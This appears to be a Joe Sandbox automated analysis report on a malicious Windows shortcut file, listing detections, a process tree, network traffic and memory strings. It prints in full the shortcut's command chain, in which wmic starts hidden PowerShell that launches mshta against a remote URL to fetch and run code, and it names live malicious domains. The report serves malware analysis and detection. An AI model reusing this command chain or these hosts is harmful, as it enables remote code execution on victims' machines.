Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s0zqlmETpm.lnk

Overview

General Information

Sample name:s0zqlmETpm.lnk
renamed because original name is a hash value
Original sample name:26e702394de8882a3df671705bc3367b.lnk
Analysis ID:1571236
MD5:26e702394de8882a3df671705bc3367b
SHA1:5bc807593b07922cb43189331cb4e216b34fedce
SHA256:9392ba6607494f23e5979d7bf6be8519ab8aa7e0377fe9aeb02987aa8521a488
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • WMIC.exe (PID: 5932 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6752 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 1424 cmdline: "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer, CommandLine: "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6752, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer, ProcessId: 1424, ProcessName: mshta.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer", ProcessId: 5932, ProcessName: WMIC.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 5932, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer, ProcessId: 6752, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7576, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://cdn.jsinit.directfwd.com/EKAvira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpZWAvira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpINetCookiesrAvira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpSWAvira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpsqAvira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpHistoryHistory.IE5Avira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/Avira URL Cloud: Label: malware
Source: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAWAvira URL Cloud: Label: malware
Source: nins.inVirustotal: Detection: 10%Perma Link
Source: cdn.jsinit.directfwd.comVirustotal: Detection: 11%Perma Link
Source: s0zqlmETpm.lnkReversingLabs: Detection: 15%
Source: s0zqlmETpm.lnkVirustotal: Detection: 31%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.2% probability
Source: unknownHTTPS traffic detected: 216.10.240.70:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /powersearchqueer HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nins.inConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /powersearchqueer HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nins.inConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nins.in
Source: global trafficDNS traffic detected: DNS query: cdn.jsinit.directfwd.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 06:22:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 09 Sep 2021 08:21:58 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/EK
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337570086.00000245A56FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2493522663.0000024DA7430000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337609873.00000245A5700000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2495774836.0000024DA8285000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337570086.00000245A56F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAW
Source: mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpHistoryHistory.IE5
Source: mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpINetCookiesr
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpSW
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpZW
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpsq
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: svchost.exe, 0000000D.00000002.2494814956.0000029E1AA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.13.dr, qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.1339721621.0000029E1A770000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2494779872.0000024DA8170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/
Source: mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmp, s0zqlmETpm.lnkString found in binary or memory: https://nins.in/powersearchqueer
Source: powershell.exeString found in binary or memory: https://nins.in/powersearchqueer$global:?
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer-W
Source: mshta.exe, 00000007.00000002.2492262200.00000245A56DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A56DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer...
Source: mshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer...wW
Source: mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer/
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer0
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer3
Source: mshta.exe, 00000007.00000002.2491101133.0000007E70AF6000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueer9
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerC:
Source: mshta.exe, 00000007.00000002.2493252687.00000245A6FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerH
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerK
Source: mshta.exe, 00000007.00000002.2491924278.00000245A55B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerM
Source: WMIC.exe, 00000000.00000002.1250128623.000001BED3500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerON=8f089
Source: mshta.exe, 00000007.00000002.2495774836.0000024DA8285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerhttps://nins.in/powersearchqueer
Source: WMIC.exe, 00000000.00000003.1249009501.000001BED3223000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.1249352677.000001BED3223000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.1249795408.000001BED3223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueeription
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerk-jspark_init.phpINetCookiesr
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerveEventt
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueerx
Source: mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nins.in/powersearchqueery
Source: qmgr.db.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownHTTPS traffic detected: 216.10.240.70:443 -> 192.168.2.7:49699 version: TLS 1.2

System Summary

barindex
Source: WMIC.exe, 00000000.00000002.1249591524.000001BED31D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer"C:\Users\user\Desktop\s0zqlmETpm.lnkWinsta0\Defaultmemstr_df9ef980-6
Source: s0zqlmETpm.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal96.evad.winLNK@7/8@4/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53waf0tg.a1l.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: s0zqlmETpm.lnkReversingLabs: Detection: 15%
Source: s0zqlmETpm.lnkVirustotal: Detection: 31%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/powersearchqueer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueer
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueerJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
